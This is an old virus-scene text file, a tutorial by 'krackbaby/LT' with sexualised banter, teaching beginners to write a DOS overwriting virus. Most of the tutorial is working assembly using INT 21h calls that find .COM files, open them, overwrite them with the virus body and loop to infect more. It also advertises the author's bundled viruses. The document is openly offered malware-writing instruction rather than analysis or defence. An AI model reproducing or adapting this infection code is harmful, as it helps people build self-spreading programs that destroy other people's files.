|
Virus tutorial on overwritterz by krackbaby/LT
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
---==kRaCkBaBy's Overwritter Tutorial==---
/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\
/====/ |~~|~~| |~~|~~| \====\
| / |--+--| |--+--| \ |
| / |__|__| |__|__| \ |
\|_/ \_|/
+--==>==================[>Da`kRaCkHoUsE Presents<]=================<==--+
/| \=============[>kRaCkBaBy's Overwritter Tutorial<]============/ |\
| _____ |
| |~~~~~|~~~~~| |~~~~~|~~~~~| /-----\ |
| | | | | | | /| |\ |
| |=====+=====| |=====+=====| || 666 || |
| | | | | | | || || |
| |_____|_____| |_____|_____| || ?|| |
| || || |
\ \_| ||_____|| |_/ /
\_/=====================================================/_______\=====\_/
---------------------------------------------------------|_______|---------
__m_/???\_m__
--Disklamer----------
Ok...let's get this out ov the way, overwritters are lame but
there is still a lack ov information on the subject and it is a good
place to start for beginnerz so here is my lame tutorial.
--Preperation--------
You must gather your toolz. So i get my assembler, linker,
vaseline and text editor. Then i put on my black leather corset and
black fishnets, heelz and elbow length glovez. Take a sip and swig
ov DrPepper (nektor ov the godz) and light a cigarette.
--First--------------
First things third, you need to have some elementry
understanding ov assembly. Even for overwritters. There are alot ov
tutorials on assembly out there on the net so get out there and find
them.
--koding-------------
Ok let's get to the coding. The first thing you will need the
virus ta do is find a host. So what you use is tha find first/find next
funktion ov DOS interupt 21h. Funktion = 4e00h and the interupt is 21h,
like this:
mov ax,4e00h ;dos funktion find first matching file
mov cx,0 ;with these attributes (archive only)
mov dx,offset prey ;offset of filemask
int 21h ;execute the dos funktion set above in ax
...
prey db '*.com', 0 ;place to put filemask
The above code will find a .COM file with the archive
attribute only, no other attributes are set on the file that it looks
for. Ok now that you have found the file that you are gonna infect
we need to open the file. Ok the funktion = 3d02h like this:
mov ax,3d02h ;dos funktion open file read write
mov dx,9eh ;offset of filename in dta
int 21h ;execute the dos funktion set above in ax
Now you just opened the file and when you executed this
funktion the 'file handle' is returned in AX and we need it in BX
so we do an exchange. Like this:
xchg ax,bx
Ok now we are ready for the part that makes me get all hot and
bothered :) :P :b ;). Infection is sooo sexy. Now we write the virus
to the host or for the slower ppl, the file we just found and opened.
Now to do that we use funktion = 4000h like this:
mov ax,4000h ;dos funktion write to file
mov cx,ksinkvxe-ksinkvxs ;how many bytes to write
mov dx,offset ksinkvxs ;where to start
int 21h ;execute the dos funktion set above in ax
MMmmmmmmmmmmmmmm makes me soooo HOT and BOTHERED when i do that.
Ok well now that we have done that we are almost done. But not till i
climax. ;) Ok we now have to close tha file we opened. So we use the
funktion = 3e00h like this:
mov ax,3e00h ;dos funktion close file
int 21h ;execute the dos funktion set above in ax
Ok the file is closed and the virus written to it. Now we will
look for another file to infect so we set the find next funktion and
jump up to the int 21h after the find first funktion and use that. :)
The find next funktion = 4f00h like this:
mov ax,4f00h ;dos funktion find next matching file
jmp trollmore ;jump to label trollmore
;cx and dx are already set in the
;find first routine
Now all we need ta do is to terminate execution ov the virus
code and we are done! So ta do this we use the terminate funktion
4c00h like this:
mov ax,4c00h ;dos funktion terminate with output
int 21h ;execute funktion we set in ax above
Ok we are done now and the virus has spread. :) The above
code samples we taken from one ov the first virii i wrote so suck my
ass if ya don't like it. ;) The code is from the kitchensink virus
which is included in this zip file, along with v2.oo ov the
kitchensink virus and Krap v2.oo one ov the first versions of my
Champainge virus. And the backmasking virus, also one ov my first,
which is basically kitchensink running backwards....oh well, still
can't code fer shit.....time to end class my fishnets got a run in
them and this corset is sooooo tight. ;) Cya l8r sexy boys. Kum see me
on IRC Undernet #virus or #!!!!!strap-on....Hugz and kissez :*
+----===={forever yourz
+-----===={kRaCkBaBy/LT
|
|
